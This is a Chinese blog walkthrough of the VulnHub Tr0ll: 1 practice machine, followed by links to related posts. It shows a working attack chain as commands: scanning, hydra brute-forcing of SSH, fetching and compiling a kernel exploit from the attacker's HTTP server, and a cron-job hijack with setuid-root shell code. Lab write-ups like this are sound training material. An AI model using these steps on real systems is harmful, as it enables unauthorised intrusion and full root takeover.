vulnhub Tr0ll: 1

最新推荐文章于 2022-11-20 21:37:03 发布
最新推荐文章于 2022-11-20 21:37:03 发布
阅读量1.6k 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 hydra python 定时任务提权 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/122029419
版权

本文思路

nmap扫描开放端口---->匿名登录ftp,下载lol.pcap---->wireshark打开并分析lol.pcap,找到sup3rs3cr3tdirlol目录---->sup3rs3cr3tdirlol目录下找到roflmao,执行后发现0x0856BF目录---->hydra爆破得到ssh用户名密码---->提权:内核版本漏洞提权(或者定时任务提权)

具体步骤

这个靶机脑洞有点大

步骤1:nmap扫描靶机

sudo nmap -sS -A -p 1-10000 192.168.101.30

扫描结果如下图所示,扫描到了21(ftp)端口,22(ssh)端口,80(http) 端口

并且值得注意的是21端口允许匿名登录

步骤2:nikto和dirb扫描(没有扫出有用信息)

nikto扫描靶机的命令

nikto -host 192.168.101.30

扫描结果

dirb扫描靶机的命令

dirb http://192.168.101.30

扫描结果

没扫出啥有用的,访问了一下扫描到的目录和文件,没有啥有价值的信息。

步骤3:匿名访问ftp,下载lol.pcap

用浏览器访问ftp://192.168.101.30/ ,并下载lol.pcap

步骤4:用wireshark查看lol.pcap,找到目录sup3rs3cr3tdirlol

用wireshark打开lol.pcap,按协议给报文排序,在FTP-DATA中找到secret_stuff.txt的内容,其中包含sup3rs3cr3tdirlol,看起来像个目录的名字

步骤5:找到roflmao并执行,得到下一个目录名0x0856BF

先试了用ftp协议访问sup3rs3cr3tdirlol,没成功;

后来访问了http://192.168.101.30/sup3rs3cr3tdirlol/,成功找到文件roflmao。

下载之后用strings命令看了一下roflmao的内容,感觉像是个可执行文件

修改文件权限为700,并执行

chmod 700 roflmao
./roflmao

执行结果如下,0x0856BF又是一个目录名

步骤6:hydra爆破得到系统用户名和密码

访问http://192.168.101.30/0x0856BF/看到如下两个目录

http://192.168.101.30/0x0856BF/good_luck/ 下面有一个txt文件

结合文件名和内容,应该是可能的用户名

把该文件内容保存到users.txt(genphlux后面的提示去掉)

http://192.168.101.30/0x0856BF/this_folder_contains_the_password/ 下面有一个文件Pass.txt,打开之后只有一行Good_job_:)

下面用hydra尝试爆破ssh用户名密码

先试了一下下面的命令,没爆破出来

hydra -L users.txt -p "Good_job_:)" ssh://192.168.101.30

又试了下面这个命令,爆破出来用户名是overflow,密码是Pass.txt(太狗了)

hydra -L users.txt -p "Pass.txt" ssh://192.168.101.30

爆破的时候注意,靶机的ssh似乎是有一点防暴力破解机制的,失败次数多了会连不上,歇几分钟再爆。

ssh登录靶机

ssh overflow@192.168.101.30

用如下命令得到交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

步骤7:内核版本漏洞提权

靶机上输入如下命令得到内核版本号

uname -a

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers搜索3.13.0,得到两个结果,选择https://www.exploit-db.com/exploits/37292,下载exp:37292.c

攻击机上开http服务:

python -m SimpleHTTPServer 7777

靶机中进入到tmp目录(所有用户有写权限),下载37292.c

wget http://192.168.101.20:7777/37292.c

用gcc命令编译

gcc -o 37292 37292.c

执行

./37292

执行成功,获得root权限 

在/root目录下找到proof.txt

另一种提权思路:定时任务提权

打完之后看看官网的writeup,发现有人用定时任务提权。其实我发现下载到/tmp下面的文件过一段时间就没了,但是没有往这方面想,一方面是因为内核漏洞提权太方便,另一方面也是因为我菜……

查找权限777的文件

find / -perm 777 -type f 2>/dev/null

把之前没遇到过的3个都cat一遍,发现 /var/tmp/cleaner.py.swp和/var/log/cronlog都与/lib/log/cleaner.py有关,且/var/log/cronlog的内容表明/lib/log/cleaner.py是一个每2分钟执行一次的定时任务。

从/lib/log/cleaner.py的内容可知,其作用是清空/tmp/目录下的所有文件。

 

由于 /lib/log/cleaner.py是所有用户可编辑的,又是以root权限运行的定时任务,因此可以通过修改该文件的内容,并等待定时任务触发来提权。

有一个博客写了好多种具体的利用定时任务提权的方法,还挺详细的,这里就不赘述了

Tr0ll:1靶机-Walkthrough_ins1ght的博客-CSDN博客

这里演示其中一种:

首先建立两个文件suid.c和suid.py,内容分别如下:

suid.c

int main(void){
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

suid.py

#!/usr/bin/env python
import os
import sys
try:
    os.system('chown root:root /tmp/suid; chmod 4777 /tmp/suid')
except:
    sys.exit()

然后攻击机起http服务,靶机上用wget命令把这两个文件拷贝到/tmp目录下。

编译suid.c

gcc -o suid suid.c

用/tmp/suid.py的内容覆盖/lib/log/cleaner.py的内容

cat /tmp/suid.py > /lib/log/cleaner.py

然后等待suid文件的属主变成root就行了

执行

./suid

获得root用户权限 

仙女象
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:Tr0ll: 1
汗的博客
03-31 1578
这次的靶机是Vulnhub靶机:Tr0ll: 1 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/tr0ll-1%2C100/ 文件大小: 434 MB MD5: 318FE0B1C0DD4FA0A8DCA43EDACE8B20 SHA1: 9C459ED10166ACAB9B7D8...
【渗透测试】VulnHub-Tr0ll:1
m0_52923241的博客
11-04 248
VulnHub-Tr0ll:1VulnHub-Tr0ll:1渗透详细思路小知识点常用工具篇 VulnHub-Tr0ll:1渗透详细思路 VulnHub-Tr0ll:1渗透详细思路 这是我打的第四个靶机,思路比以前清晰很多,一些常用的工具 nmap找目标ip,开放端口(21:ftp;22:ssh;80:http),访问web页面寻找有用信息 dirb扫目录 cd /tmp wget http://192.168.246.129/37292.c gcc 37292.c -o exp chmod +x exp .
靶机渗透测试(Tr0ll: 1)
@小张小张的博客
12-14 1151
靶机渗透测试(Tr0ll: 1): Vulnhub靶机 Tr0ll: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Beginner)) 描述:The goal is simple, gain root and get Proof.txt from the /root directory 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192
oscp——Tr0ll: 1
王嘟嘟的博客
03-12 346
# 0x00 目标资料 ## 链接 https://www.vulnhub.com/entry/tr0ll-1,100/ ## 难度推荐 5 - 思路 2 - Web80——UserShell 2 - UserShell——Rootshel 1 ## 环境搭建 - VM...
No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习
qq_34801745的博客
12-30 1283
** VulnHub-Tr0ll:1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单(CTF) 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇曳的机器 目标:得到root权限&找到proof.txt 作者:大余 时间:2019-12-30 请注意:对于所有...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
tr0ll2.docx
最新发布
07-04
tr0ll2.docx
tr069tc:测试客户
05-02
tr069tc 该项目不是整个FreeACS产品的一部分,但是对测试Web Service Server很有用。 在此处获取完整图片: : 依存关系 Jarfiles可在该项目的lib文件夹中找到。 Eclipse设定 Git视图:导入git repo Git视图:从git...
TR22015FS:TR22015FS
07-19
【标题】"TR22015FS:TR22015FS"与【描述】"TR22015FS TR22015FS"提供的信息相对简洁,没有明确指出具体的技术主题或项目内容。不过,由于标签是"Java",我们可以推断这可能与一个使用Java编程语言的项目或教程有关。...
vulnhub靶机Tr0ll:1渗透笔记
weixin_52268949的博客
03-12 5205
Tr0ll:1渗透笔记 靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ kali ip:192.168.20.128 靶机和kali位于同一网段 信息收集 首先通过nmap扫描靶机ip地址 nmap -sP 192.168.20.0/24 确定靶机ip 扫描开放端口 nmap -sV 192.168.20.129 发现21 和80 端口可能有用我们先来看看80端口 并没有发现什么信息我们使用dirb扫描一下目录 dirb http://192.1
Tr0ll:1靶机-Walkthrough
ins1ght的博客
09-14 2200
Tr0ll:1靶机,比较基础,提供了2种思路和5种提权方法。
vulnhub靶机Tr0ll渗透笔记
liver100day的博客
06-08 759
Tr0ll靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:Tr0ll IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 1.2 端口扫描(masscan或nmap) messcan --rate=100000 -p 0-65535 192.168.75.147
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2053
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
All-in-one 安装openstack实验记录
qq_56639008的博客
07-07 1575
工欲善其事必先利其器,学习私有云open stac,首先就需要如何学会搭建他,我会通过两种的方法去搭建,言归正传,直接进入安装
suid位,sgid位及setuid(),setgid()函数实测情况
zhangmiaoping23的专栏
06-24 781
suid 标识位,可执行程序文件以所有者的身份被执行 1039进程sh         root@generic:/system/bin # cat /proc/1039/status         cat /proc/1039/status         Name:   sh         State:  S (sleeping)         Tgid:   103
Wireshark分析--SMB2协议包及hashcat爆破
hapenl的博客
10-18 4384
通过wireshark对SMB协议包的分析以及构造hash爆破文件的方法,最后通过hashcat进行爆破获取用户相关敏感信息
wireshark的简单抓取网站用户名和密码操作
m0_57511185的博客
11-01 7144
之前知道了如何安装Wireshark,现在来进行Wireshark的一些简单操作,如何利用wires获得登陆网站的用户名和密码。 打开Wireshark,连接网络,选择接口 我用的WiFi,所以选择接口WLAN即可 然后我们就能收到源源不断的包 二、打开你想要登陆的网站,进行登陆操作 登陆成功后,再点击wireshark页面的红色按钮停止抓包 三、过滤所抓的包 此时的页面上仍然有很多用不到的包,所以我们需要设置应用显示过滤器的过滤语句为:http.r...
LOLHelper
qq_44838440的博客
01-04 1412
利用 lol api 实现自动接收对局和锁定英雄
QObject::tr和QObject::trUtf8
06-11
QObject::tr和QObject::trUtf8都是Qt框架中用于国际化和本地化的函数,用于将字符串翻译成不同语言或字符集的文本。 QObject::tr函数是Qt框架中用于国际化和本地化的函数,用于将字符串翻译成不同语言的文本。它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值